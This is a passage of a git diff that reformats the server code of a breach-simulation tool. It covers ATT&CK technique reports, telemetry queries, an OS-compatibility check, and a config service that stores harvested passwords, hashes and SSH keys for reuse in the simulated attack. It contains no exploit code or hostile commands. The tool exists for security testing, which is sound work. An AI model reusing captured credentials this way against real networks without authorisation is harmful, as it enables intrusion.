bits_results}) + data.update({"bits_jobs": bits_results}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py index baefcba8e..9d4a17bf5 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py @@ -7,8 +7,12 @@ __author__ = "VakarisZ" class T1210(AttackTechnique): tech_id = "T1210" - unscanned_msg = "Monkey didn't scan any remote services. Maybe it didn't find any machines on the network?" - scanned_msg = "Monkey scanned for remote services on the network, but couldn't exploit any of them." + unscanned_msg = ( + "Monkey didn't scan any remote services. Maybe it didn't find any machines on the network?" + ) + scanned_msg = ( + "Monkey scanned for remote services on the network, but couldn't exploit any of them." + ) used_msg = "Monkey scanned for remote services and exploited some on the network." @staticmethod @@ -31,29 +35,45 @@ class T1210(AttackTechnique): scanned_services, exploited_services = [], [] else: scanned_services, exploited_services = status_and_data[1], status_and_data[2] - data = {'title': T1210.technique_title()} + data = {"title": T1210.technique_title()} data.update(T1210.get_message_and_status(status)) data.update(T1210.get_mitigation_by_status(status)) - data.update({'scanned_services': scanned_services, 'exploited_services': exploited_services}) + data.update( + {"scanned_services": scanned_services, "exploited_services": exploited_services} + ) return data @staticmethod def get_scanned_services(): - results = mongo.db.telemetry.aggregate([{'$match': {'telem_category': 'scan'}}, - {'$sort': {'data.service_count': -1}}, - {'$group': { - '_id': {'ip_addr': '$data.machine.ip_addr'}, - 'machine': {'$first': '$data.machine'}, - 'time': {'$first': '$timestamp'}}}]) + results = mongo.db.telemetry.aggregate( + [ + {"$match": {"telem_category": "scan"}}, + {"$sort": {"data.service_count": -1}}, + { + "$group": { + "_id": {"ip_addr": "$data.machine.ip_addr"}, + "machine": {"$first": "$data.machine"}, + "time": {"$first": "$timestamp"}, + } + }, + ] + ) return list(results) @staticmethod def get_exploited_services(): - results = mongo.db.telemetry.aggregate([{'$match': {'telem_category': 'exploit', 'data.result': True}}, - {'$group': { - '_id': {'ip_addr': '$data.machine.ip_addr'}, - 'service': {'$first': '$data.info'}, - 'machine': {'$first': '$data.machine'}, - 'time': {'$first': '$timestamp'}}}]) + results = mongo.db.telemetry.aggregate( + [ + {"$match": {"telem_category": "exploit", "data.result": True}}, + { + "$group": { + "_id": {"ip_addr": "$data.machine.ip_addr"}, + "service": {"$first": "$data.info"}, + "machine": {"$first": "$data.machine"}, + "time": {"$first": "$timestamp"}, + } + }, + ] + ) return list(results) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py index 796c1a043..6ed73765a 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py @@ -6,15 +6,21 @@ __author__ = "shreyamalviya" class T1216(PostBreachTechnique): tech_id = "T1216" - unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\ - "pre-existing signed script since it didn't run on any Windows machines. " +\ - "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\ - "bypass application control and signature validation on systems." - scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\ - "pre-existing signed script on Windows but failed. " +\ - "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\ - "bypass application control and signature validation on systems." - used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\ - "This behavior could be abused by adversaries to execute malicious files that could " +\ - "bypass application control and signature validation on systems." + unscanned_msg = ( + "Monkey didn't attempt to execute an arbitrary program with the help of a " + + "pre-existing signed script since it didn't run on any Windows machines. " + + "If successful, this behavior could be abused by adversaries to execute malicious files that could " + + "bypass application control and signature validation on systems." + ) + scanned_msg = ( + "Monkey attempted to execute an arbitrary program with the help of a " + + "pre-existing signed script on Windows but failed. " + + "If successful, this behavior could be abused by adversaries to execute malicious files that could " + + "bypass application control and signature validation on systems." + ) + used_msg = ( + "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " + + "This behavior could be abused by adversaries to execute malicious files that could " + + "bypass application control and signature validation on systems." + ) pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py index 940c9e8ea..3a6ba6f97 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py @@ -11,14 +11,28 @@ class T1222(AttackTechnique): scanned_msg = "Monkey tried to change file permissions, but failed." used_msg = "Monkey successfully changed file permissions in network systems." - query = [{'$match': {'telem_category': 'attack', - 'data.technique': 'T1222', - 'data.status': ScanStatus.USED.value}}, - {'$group': {'_id': {'machine': '$data.machine', 'status': '$data.status', 'command': '$data.command'}}}, - {"$replaceRoot": {"newRoot": "$_id"}}] + query = [ + { + "$match": { + "telem_category": "attack", + "data.technique": "T1222", + "data.status": ScanStatus.USED.value, + } + }, + { + "$group": { + "_id": { + "machine": "$data.machine", + "status": "$data.status", + "command": "$data.command", + } + } + }, + {"$replaceRoot": {"newRoot": "$_id"}}, + ] @staticmethod def get_report_data(): data = T1222.get_tech_base_data() - data.update({'commands': list(mongo.db.telemetry.aggregate(T1222.query))}) + data.update({"commands": list(mongo.db.telemetry.aggregate(T1222.query))}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py index c2ed8d3f8..d348c921b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py @@ -13,11 +13,23 @@ class T1504(PostBreachTechnique): @staticmethod def get_pba_query(*args): - return [{'$match': {'telem_category': 'post_breach', - 'data.name': POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION}}, - {'$project': {'_id': 0, - 'machine': {'hostname': {'$arrayElemAt': ['$data.hostname', 0]}, - 'ips': [{'$arrayElemAt': ['$data.ip', 0]}]}, - 'result': '$data.result'}}, - {'$unwind': '$result'}, - {'$match': {'result': {'$regex': r'profile\.ps1'}}}] + return [ + { + "$match": { + "telem_category": "post_breach", + "data.name": POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION, + } + }, + { + "$project": { + "_id": 0, + "machine": { + "hostname": {"$arrayElemAt": ["$data.hostname", 0]}, + "ips": [{"$arrayElemAt": ["$data.ip", 0]}], + }, + "result": "$data.result", + } + }, + {"$unwind": "$result"}, + {"$match": {"result": {"$regex": r"profile\.ps1"}}}, + ] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py b/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py index 61c1f89bd..7cdf9010c 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py @@ -10,8 +10,10 @@ from monkey_island.cc.services.attack.attack_config import AttackConfig logger = logging.getLogger(__name__) -disabled_msg = "This technique has been disabled. " +\ - "You can enable it from the [configuration page](../../configure)." +disabled_msg = ( + "This technique has been disabled. " + + "You can enable it from the [configuration page](../../configure)." +) class AttackTechnique(object, metaclass=abc.ABCMeta): @@ -65,13 +67,21 @@ class AttackTechnique(object, metaclass=abc.ABCMeta): """ if not cls._is_enabled_in_config(): return ScanStatus.DISABLED.value - elif mongo.db.telemetry.find_one({'telem_category': 'attack', - 'data.status': ScanStatus.USED.value, - 'data.technique': cls.tech_id}): + elif mongo.db.telemetry.find_one( + { + "telem_category": "attack", + "data.status": ScanStatus.USED.value, + "data.technique": cls.tech_id, + } + ): return ScanStatus.USED.value - elif mongo.db.telemetry.find_one({'telem_category': 'attack', - 'data.status': ScanStatus.SCANNED.value, - 'data.technique': cls.tech_id}): + elif mongo.db.telemetry.find_one( + { + "telem_category": "attack", + "data.status": ScanStatus.SCANNED.value, + "data.technique": cls.tech_id, + } + ): return ScanStatus.SCANNED.value else: return ScanStatus.UNSCANNED.value @@ -83,7 +93,7 @@ class AttackTechnique(object, metaclass=abc.ABCMeta): :param status: Enum from common/attack_utils.py integer value :return: Dict with message and status """ - return {'message': cls.get_message_by_status(status), 'status': status} + return {"message": cls.get_message_by_status(status), "status": status} @classmethod def get_message_by_status(cls, status): @@ -106,7 +116,7 @@ class AttackTechnique(object, metaclass=abc.ABCMeta): """ :return: techniques title. E.g. "T1110 Brute force" """ - return AttackConfig.get_technique(cls.tech_id)['title'] + return AttackConfig.get_technique(cls.tech_id)["title"] @classmethod def get_tech_base_data(cls): @@ -117,16 +127,16 @@ class AttackTechnique(object, metaclass=abc.ABCMeta): data = {} status = cls.technique_status() title = cls.technique_title() - data.update({'status': status, - 'title': title, - 'message': cls.get_message_by_status(status)}) + data.update( + {"status": status, "title": title, "message": cls.get_message_by_status(status)} + ) data.update(cls.get_mitigation_by_status(status)) return data @classmethod def get_base_data_by_status(cls, status): data = cls.get_message_and_status(status) - data.update({'title': cls.technique_title()}) + data.update({"title": cls.technique_title()}) data.update(cls.get_mitigation_by_status(status)) return data @@ -134,14 +144,19 @@ class AttackTechnique(object, metaclass=abc.ABCMeta): def get_mitigation_by_status(cls, status: ScanStatus) -> dict: if status == ScanStatus.USED.value: mitigation_document = AttackMitigations.get_mitigation_by_technique_id(str(cls.tech_id)) - return {'mitigations': mitigation_document.to_mongo().to_dict()['mitigations']} + return {"mitigations": mitigation_document.to_mongo().to_dict()["mitigations"]} else: return {} @classmethod def is_status_disabled(cls, get_technique_status_and_data) -> bool: def check_if_disabled_in_config(): - return (ScanStatus.DISABLED.value, []) if not cls._is_enabled_in_config() else get_technique_status_and_data() + return ( + (ScanStatus.DISABLED.value, []) + if not cls._is_enabled_in_config() + else get_technique_status_and_data() + ) + return check_if_disabled_in_config @classmethod diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py b/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py index da475c697..1366f0d3a 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py @@ -25,33 +25,45 @@ class PostBreachTechnique(AttackTechnique, metaclass=abc.ABCMeta): :return: Mongo query that parses attack telemetries for a simple report component (gets machines and post-breach action usage). """ - return [{'$match': {'telem_category': 'post_breach', - '$or': [{'data.name': pba_name} for pba_name in post_breach_action_names]}}, - {'$project': {'_id': 0, - 'machine': {'hostname': '$data.hostname', - 'ips': ['$data.ip']}, - 'result': '$data.result'}}] + return [ + { + "$match": { + "telem_category": "post_breach", + "$or": [{"data.name": pba_name} for pba_name in post_breach_action_names], + } + }, + { + "$project": { + "_id": 0, + "machine": {"hostname": "$data.hostname", "ips": ["$data.ip"]}, + "result": "$data.result", + } + }, + ] @classmethod def get_report_data(cls): """ :return: Technique's report data aggregated from the database """ + @cls.is_status_disabled def get_technique_status_and_data(): info = list(mongo.db.telemetry.aggregate(cls.get_pba_query(cls.pba_names))) status = ScanStatus.UNSCANNED.value if info: - successful_PBAs = mongo.db.telemetry.count({ - '$or': [{'data.name': pba_name} for pba_name in cls.pba_names], - 'data.result.1': True - }) + successful_PBAs = mongo.db.telemetry.count( + { + "$or": [{"data.name": pba_name} for pba_name in cls.pba_names], + "data.result.1": True, + } + ) status = ScanStatus.USED.value if successful_PBAs else ScanStatus.SCANNED.value return (status, info) - data = {'title': cls.technique_title()} + data = {"title": cls.technique_title()} status, info = get_technique_status_and_data() data.update(cls.get_base_data_by_status(status)) - data.update({'info': info}) + data.update({"info": info}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py b/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py index 6921b0129..0a9a1045b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py @@ -7,16 +7,16 @@ def parse_creds(attempt): :param attempt: login attempt from database :return: string with username and used password/hash """ - username = attempt['user'] - creds = {'lm_hash': {'type': 'LM hash', 'output': censor_hash(attempt['lm_hash'])}, - 'ntlm_hash': {'type': 'NTLM hash', 'output': censor_hash(attempt['ntlm_hash'], 20)}, - 'ssh_key': {'type': 'SSH key', 'output': attempt['ssh_key']}, - 'password': {'type': 'Plaintext password', 'output': censor_password(attempt['password'])}} + username = attempt["user"] + creds = { + "lm_hash": {"type": "LM hash", "output": censor_hash(attempt["lm_hash"])}, + "ntlm_hash": {"type": "NTLM hash", "output": censor_hash(attempt["ntlm_hash"], 20)}, + "ssh_key": {"type": "SSH key", "output": attempt["ssh_key"]}, + "password": {"type": "Plaintext password", "output": censor_password(attempt["password"])}, + } for key, cred in list(creds.items()): if attempt[key]: - return '%s ; %s : %s' % (username, - cred['type'], - cred['output']) + return "%s ; %s : %s" % (username, cred["type"], cred["output"]) def censor_password(password, plain_chars=3, secret_chars=5): @@ -30,7 +30,7 @@ def censor_password(password, plain_chars=3, secret_chars=5): if not password: return "" password = get_encryptor().dec(password) - return password[0:plain_chars] + '*' * secret_chars + return password[0:plain_chars] + "*" * secret_chars def censor_hash(hash_, plain_chars=5): @@ -43,4 +43,4 @@ def censor_hash(hash_, plain_chars=5): if not hash_: return "" hash_ = get_encryptor().dec(hash_) - return hash_[0: plain_chars] + ' ...' + return hash_[0:plain_chars] + " ..." diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py b/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py index 862207505..bfa406b96 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py @@ -14,10 +14,12 @@ class UsageTechnique(AttackTechnique, metaclass=abc.ABCMeta): :return: usage string """ try: - usage['usage'] = UsageEnum[usage['usage']].value[usage['status']] + usage["usage"] = UsageEnum[usage["usage"]].value[usage["status"]] except KeyError: - logger.error("Error translating usage enum. into string. " - "Check if usage enum field exists and covers all telem. statuses.") + logger.error( + "Error translating usage enum. into string. " + "Check if usage enum field exists and covers all telem. statuses." + ) return usage @classmethod @@ -35,17 +37,30 @@ class UsageTechnique(AttackTechnique, metaclass=abc.ABCMeta): :return: Query that parses attack telemetries for a simple report component (gets machines and attack technique usage). """ - return [{'$match': {'telem_category': 'attack', - 'data.technique': cls.tech_id}}, - {'$lookup': {'from': 'monkey', - 'localField': 'monkey_guid', - 'foreignField': 'guid', - 'as': 'monkey'}}, - {'$project': {'monkey': {'$arrayElemAt': ['$monkey', 0]}, - 'status': '$data.status', - 'usage': '$data.usage'}}, - {'$addFields': {'_id': 0, - 'machine': {'hostname': '$monkey.hostname', 'ips': '$monkey.ip_addresses'}, - 'monkey': 0}}, - {'$group': {'_id': {'machine': '$machine', 'status': '$status', 'usage': '$usage'}}}, - {"$replaceRoot": {"newRoot": "$_id"}}] + return [ + {"$match": {"telem_category": "attack", "data.technique": cls.tech_id}}, + { + "$lookup": { + "from": "monkey", + "localField": "monkey_guid", + "foreignField": "guid", + "as": "monkey", + } + }, + { + "$project": { + "monkey": {"$arrayElemAt": ["$monkey", 0]}, + "status": "$data.status", + "usage": "$data.usage", + } + }, + { + "$addFields": { + "_id": 0, + "machine": {"hostname": "$monkey.hostname", "ips": "$monkey.ip_addresses"}, + "monkey": 0, + } + }, + {"$group": {"_id": {"machine": "$machine", "status": "$status", "usage": "$usage"}}}, + {"$replaceRoot": {"newRoot": "$_id"}}, + ] diff --git a/monkey/monkey_island/cc/services/attack/test_mitre_api_interface.py b/monkey/monkey_island/cc/services/attack/test_mitre_api_interface.py index 4866a6729..44297795c 100644 --- a/monkey/monkey_island/cc/services/attack/test_mitre_api_interface.py +++ b/monkey/monkey_island/cc/services/attack/test_mitre_api_interface.py @@ -4,12 +4,11 @@ from monkey_island.cc.services.attack.mitre_api_interface import MitreApiInterfa class TestMitreApiInterface(TestCase): - def test_get_all_mitigations(self): mitigations = MitreApiInterface.get_all_mitigations() self.assertIsNotNone((len(mitigations.items()) >= 282)) mitigation = next(iter(mitigations.values())) - self.assertEqual(mitigation['type'], "course-of-action") - self.assertIsNotNone(mitigation['name']) - self.assertIsNotNone(mitigation['description']) - self.assertIsNotNone(mitigation['external_references']) + self.assertEqual(mitigation["type"], "course-of-action") + self.assertIsNotNone(mitigation["name"]) + self.assertIsNotNone(mitigation["description"]) + self.assertIsNotNone(mitigation["external_references"]) diff --git a/monkey/monkey_island/cc/services/bootloader.py b/monkey/monkey_island/cc/services/bootloader.py index 2d8a14055..05bdac8f1 100644 --- a/monkey/monkey_island/cc/services/bootloader.py +++ b/monkey/monkey_island/cc/services/bootloader.py @@ -4,20 +4,22 @@ from bson import ObjectId from monkey_island.cc.database import mongo from monkey_island.cc.services.node import NodeCreationException, NodeService -from monkey_island.cc.services.utils.bootloader_config import MIN_GLIBC_VERSION, SUPPORTED_WINDOWS_VERSIONS +from monkey_island.cc.services.utils.bootloader_config import ( + MIN_GLIBC_VERSION, + SUPPORTED_WINDOWS_VERSIONS, +) from monkey_island.cc.services.utils.node_states import NodeStates class BootloaderService: - @staticmethod def parse_bootloader_telem(telem: Dict) -> bool: - telem['ips'] = BootloaderService.remove_local_ips(telem['ips']) - if telem['os_version'] == "": - telem['os_version'] = "Unknown OS" + telem["ips"] = BootloaderService.remove_local_ips(telem["ips"]) + if telem["os_version"] == "": + telem["os_version"] = "Unknown OS" telem_id = BootloaderService.get_mongo_id_for_bootloader_telem(telem) - mongo.db.bootloader_telems.update({'_id': telem_id}, {'$setOnInsert': telem}, upsert=True) + mongo.db.bootloader_telems.update({"_id": telem_id}, {"$setOnInsert": telem}, upsert=True) will_monkey_run = BootloaderService.is_os_compatible(telem) try: @@ -26,33 +28,33 @@ class BootloaderService: # Didn't find the node, but allow monkey to run anyways return True - node_group = BootloaderService.get_next_node_state(node, telem['system'], will_monkey_run) - if 'group' not in node or node['group'] != node_group.value: - NodeService.set_node_group(node['_id'], node_group) + node_group = BootloaderService.get_next_node_state(node, telem["system"], will_monkey_run) + if "group" not in node or node["group"] != node_group.value: + NodeService.set_node_group(node["_id"], node_group) return will_monkey_run @staticmethod def get_next_node_state(node: Dict, system: str, will_monkey_run: bool) -> NodeStates: - group_keywords = [system, 'monkey'] - if 'group' in node and node['group'] == 'island': - group_keywords.extend(['island', 'starting']) + group_keywords = [system, "monkey"] + if "group" in node and node["group"] == "island": + group_keywords.extend(["island", "starting"]) else: - group_keywords.append('starting') if will_monkey_run else group_keywords.append('old') + group_keywords.append("starting") if will_monkey_run else group_keywords.append("old") node_group = NodeStates.get_by_keywords(group_keywords) return node_group @staticmethod def get_mongo_id_for_bootloader_telem(bootloader_telem) -> ObjectId: - ip_hash = hex(hash(str(bootloader_telem['ips'])))[3:15] - hostname_hash = hex(hash(bootloader_telem['hostname']))[3:15] + ip_hash = hex(hash(str(bootloader_telem["ips"])))[3:15] + hostname_hash = hex(hash(bootloader_telem["hostname"]))[3:15] return ObjectId(ip_hash + hostname_hash) @staticmethod def is_os_compatible(bootloader_data) -> bool: - if bootloader_data['system'] == 'windows': - return BootloaderService.is_windows_version_supported(bootloader_data['os_version']) - elif bootloader_data['system'] == 'linux': - return BootloaderService.is_glibc_supported(bootloader_data['glibc_version']) + if bootloader_data["system"] == "windows": + return BootloaderService.is_windows_version_supported(bootloader_data["os_version"]) + elif bootloader_data["system"] == "linux": + return BootloaderService.is_glibc_supported(bootloader_data["glibc_version"]) @staticmethod def is_windows_version_supported(windows_version) -> bool: @@ -61,8 +63,8 @@ class BootloaderService: @staticmethod def is_glibc_supported(glibc_version_string) -> bool: glibc_version_string = glibc_version_string.lower() - glibc_version = glibc_version_string.split(' ')[-1] - return glibc_version >= str(MIN_GLIBC_VERSION) and 'eglibc' not in glibc_version_string + glibc_version = glibc_version_string.split(" ")[-1] + return glibc_version >= str(MIN_GLIBC_VERSION) and "eglibc" not in glibc_version_string @staticmethod def remove_local_ips(ip_list) -> List[str]: diff --git a/monkey/monkey_island/cc/services/bootloader_test.py b/monkey/monkey_island/cc/services/bootloader_test.py index f71c36184..81c4affff 100644 --- a/monkey/monkey_island/cc/services/bootloader_test.py +++ b/monkey/monkey_island/cc/services/bootloader_test.py @@ -10,23 +10,24 @@ WINDOWS_VERSIONS = { "6.1": "Windows 7/server 2008R2", "6.2": "Windows 8/server 2012", "6.3": "Windows 8.1/server 2012R2", - "10.0": "Windows 10/server 2016-2019" + "10.0": "Windows 10/server 2016-2019", } MIN_GLIBC_VERSION = 2.14 class TestBootloaderService(TestCase): - def test_is_glibc_supported(self): str1 = "ldd (Ubuntu EGLIBC 2.15-0ubuntu10) 2.15" str2 = "ldd (GNU libc) 2.12" str3 = "ldd (GNU libc) 2.28" str4 = "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23" - self.assertTrue(not BootloaderService.is_glibc_supported(str1) and - not BootloaderService.is_glibc_supported(str2) and - BootloaderService.is_glibc_supported(str3) and - BootloaderService.is_glibc_supported(str4)) + self.assertTrue( + not BootloaderService.is_glibc_supported(str1) + and not BootloaderService.is_glibc_supported(str2) + and BootloaderService.is_glibc_supported(str3) + and BootloaderService.is_glibc_supported(str4) + ) def test_remove_local_ips(self): ips = ["127.1.1.1", "127.0.0.1", "192.168.56.1"] diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 9fd8e3417..5978431d6 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -14,24 +14,29 @@ from monkey_island.cc.services.config_schema.config_schema import SCHEMA __author__ = "itay.mizeretz" -from common.config_value_paths import (AWS_KEYS_PATH, EXPORT_MONKEY_TELEMS_PATH, - LM_HASH_LIST_PATH, NTLM_HASH_LIST_PATH, - PASSWORD_LIST_PATH, SSH_KEYS_PATH, - STARTED_ON_ISLAND_PATH, USER_LIST_PATH) +from common.config_value_paths import ( + AWS_KEYS_PATH, + EXPORT_MONKEY_TELEMS_PATH, + LM_HASH_LIST_PATH, + NTLM_HASH_LIST_PATH, + PASSWORD_LIST_PATH, + SSH_KEYS_PATH, + STARTED_ON_ISLAND_PATH, + USER_LIST_PATH, +) logger = logging.getLogger(__name__) # This should be used for config values of array type (array of strings only) -ENCRYPTED_CONFIG_VALUES = \ - [ - PASSWORD_LIST_PATH, - LM_HASH_LIST_PATH, - NTLM_HASH_LIST_PATH, - SSH_KEYS_PATH, - AWS_KEYS_PATH + ['aws_access_key_id'], - AWS_KEYS_PATH + ['aws_secret_access_key'], - AWS_KEYS_PATH + ['aws_session_token'] - ] +ENCRYPTED_CONFIG_VALUES = [ + PASSWORD_LIST_PATH, + LM_HASH_LIST_PATH, + NTLM_HASH_LIST_PATH, + SSH_KEYS_PATH, + AWS_KEYS_PATH + ["aws_access_key_id"], + AWS_KEYS_PATH + ["aws_secret_access_key"], + AWS_KEYS_PATH + ["aws_session_token"], +] class ConfigService: @@ -49,13 +54,16 @@ class ConfigService: :param is_island: If True, will include island specific configuration parameters. :return: The entire global config. """ - config = mongo.db.config.find_one({'name': 'initial' if is_initial_config else 'newconfig'}) or {} - for field in ('name', '_id'): + config = ( + mongo.db.config.find_one({"name": "initial" if is_initial_config else "newconfig"}) + or {} + ) + for field in ("name", "_id"): config.pop(field, None) if should_decrypt and len(config) > 0: ConfigService.decrypt_config(config) if not is_island: - config.get('cnc', {}).pop('aws_config', None) + config.get("cnc", {}).pop("aws_config", None) return config @staticmethod @@ -68,8 +76,10 @@ class ConfigService: (if it's in the list of encrypted config values). :return: The value of the requested config key. """ - config_key = functools.reduce(lambda x, y: x + '.' + y, config_key_as_arr) - config = mongo.db.config.find_one({'name': 'initial' if is_initial_config else 'newconfig'}, {config_key: 1}) + config_key = functools.reduce(lambda x, y: x + "." + y, config_key_as_arr) + config = mongo.db.config.find_one( + {"name": "initial" if is_initial_config else "newconfig"}, {config_key: 1} + ) for config_key_part in config_key_as_arr: config = config[config_key_part] if should_decrypt: @@ -83,8 +93,7 @@ class ConfigService: @staticmethod def set_config_value(config_key_as_arr, value): mongo_key = ".".join(config_key_as_arr) - mongo.db.config.update({'name': 'newconfig'}, - {"$set": {mongo_key: value}}) + mongo.db.config.update({"name": "newconfig"}, {"$set": {mongo_key: value}}) @staticmethod def get_flat_config(is_initial_config=False, should_decrypt=True): @@ -107,71 +116,67 @@ class ConfigService: @staticmethod def add_item_to_config_set_if_dont_exist(item_path_array, item_value, should_encrypt): - item_key = '.'.join(item_path_array) + item_key = ".".join(item_path_array) items_from_config = ConfigService.get_config_value(item_path_array, False, should_encrypt) if item_value in items_from_config: return if should_encrypt: item_value = get_encryptor().enc(item_value) mongo.db.config.update( - {'name': 'newconfig'}, - {'$addToSet': {item_key: item_value}}, - upsert=False + {"name": "newconfig"}, {"$addToSet": {item_key: item_value}}, upsert=False ) mongo.db.monkey.update( - {}, - {'$addToSet': {'config.' + item_key.split('.')[-1]: item_value}}, - multi=True + {}, {"$addToSet": {"config." + item_key.split(".")[-1]: item_value}}, multi=True ) @staticmethod def creds_add_username(username): - ConfigService.add_item_to_config_set_if_dont_exist(USER_LIST_PATH, - username, - should_encrypt=False) + ConfigService.add_item_to_config_set_if_dont_exist( + USER_LIST_PATH, username, should_encrypt=False + ) @staticmethod def creds_add_password(password): - ConfigService.add_item_to_config_set_if_dont_exist(PASSWORD_LIST_PATH, - password, - should_encrypt=True) + ConfigService.add_item_to_config_set_if_dont_exist( + PASSWORD_LIST_PATH, password, should_encrypt=True + ) @staticmethod def creds_add_lm_hash(lm_hash): - ConfigService.add_item_to_config_set_if_dont_exist(LM_HASH_LIST_PATH, - lm_hash, - should_encrypt=True) + ConfigService.add_item_to_config_set_if_dont_exist( + LM_HASH_LIST_PATH, lm_hash, should_encrypt=True + ) @staticmethod def creds_add_ntlm_hash(ntlm_hash): - ConfigService.add_item_to_config_set_if_dont_exist(NTLM_HASH_LIST_PATH, - ntlm_hash, - should_encrypt=True) + ConfigService.add_item_to_config_set_if_dont_exist( + NTLM_HASH_LIST_PATH, ntlm_hash, should_encrypt=True + ) @staticmethod def ssh_add_keys(public_key, private_key, user, ip): if not ConfigService.ssh_key_exists( - ConfigService.get_config_value(SSH_KEYS_PATH, False, False), user, ip): + ConfigService.get_config_value(SSH_KEYS_PATH, False, False), user, ip + ): ConfigService.add_item_to_config_set_if_dont_exist( SSH_KEYS_PATH, - { - "public_key": public_key, - "private_key": private_key, - "user": user, "ip": ip - }, + {"public_key": public_key, "private_key": private_key, "user": user, "ip": ip}, # SSH keys already encrypted in process_ssh_info() - should_encrypt=False - + should_encrypt=False, ) @staticmethod def ssh_key_exists(keys, user, ip): - return [key for key in keys if key['user'] == user and key['ip'] == ip] + return [key for key in keys if key["user"] == user and key["ip"] == ip] def _filter_none_values(data): if isinstance(data, dict): - return {k: ConfigService._filter_none_values(v) for k, v in data.items() if k is not None and v is not None} + return { + k: ConfigService._filter_none_values(v) + for k, v in data.items() + if k is not None and v is not None + } elif isinstance(data, list): return [ConfigService._filter_none_values(item) for item in data if item is not None] else: @@ -186,16 +191,18 @@ class ConfigService: try: ConfigService.encrypt_config(config_json) except KeyError: - logger.error('Bad configuration file was submitted.') + logger.error("Bad configuration file was submitted.") return False - mongo.db.config.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True) - logger.info('monkey config was updated') + mongo.db.config.update({"name": "newconfig"}, {"$set": config_json}, upsert=True) + logger.info("monkey config was updated") return True @staticmethod def init_default_config(): if ConfigService.default_config is None: - default_validating_draft4_validator = ConfigService._extend_config_with_default(Draft4Validator) + default_validating_draft4_validator = ConfigService._extend_config_with_default( + Draft4Validator + ) config = {} default_validating_draft4_validator(SCHEMA).validate(config) ConfigService.default_config = config @@ -221,25 +228,29 @@ class ConfigService: config = ConfigService.get_default_config(True) ConfigService.set_server_ips_in_config(config) ConfigService.update_config(config, should_encrypt=False) - logger.info('Monkey config reset was called') + logger.info("Monkey config reset was called") @staticmethod def set_server_ips_in_config(config): ips = local_ip_addresses() - config["internal"]["island_server"]["command_servers"] = \ - ["%s:%d" % (ip, env_singleton.env.get_island_port()) for ip in ips] - config["internal"]["island_server"]["current_server"] = "%s:%d" % (ips[0], env_singleton.env.get_island_port()) + config["internal"]["island_server"]["command_servers"] = [ + "%s:%d" % (ip, env_singleton.env.get_island_port()) for ip in ips + ] + config["internal"]["island_server"]["current_server"] = "%s:%d" % ( + ips[0], + env_singleton.env.get_island_port(), + ) @staticmethod def save_initial_config_if_needed(): - if mongo.db.config.find_one({'name': 'initial'}) is not None: + if mongo.db.config.find_one({"name": "initial"}) is not None: return - initial_config = mongo.db.config.find_one({'name': 'newconfig'}) - initial_config['name'] = 'initial' - initial_config.pop('_id') + initial_config = mongo.db.config.find_one({"name": "newconfig"}) + initial_config["name"] = "initial" + initial_config.pop("_id") mongo.db.config.insert(initial_config) - logger.info('Monkey config was inserted to mongo and saved') + logger.info("Monkey config was inserted to mongo and saved") @staticmethod def _extend_config_with_default(validator_class): @@ -260,9 +271,11 @@ class ConfigService: layer_3_dict = {} for property4, subschema4 in list(subschema3["properties"].items()): if "properties" in subschema4: - raise ValueError("monkey/monkey_island/cc/services/config.py " - "can't handle 5 level config. " - "Either change back the config or refactor.") + raise ValueError( + "monkey/monkey_island/cc/services/config.py " + "can't handle 5 level config. " + "Either change back the config or refactor." + ) if "default" in subschema4: layer_3_dict[property4] = subschema4["default"] sub_dict[property3] = layer_3_dict @@ -273,7 +286,8 @@ class ConfigService: yield error return validators.extend( - validator_class, {"properties": set_defaults}, + validator_class, + {"properties": set_defaults}, ) @staticmethod @@ -292,10 +306,18 @@ class ConfigService: keys = [config_arr_as_array[-1] for config_arr_as_array in 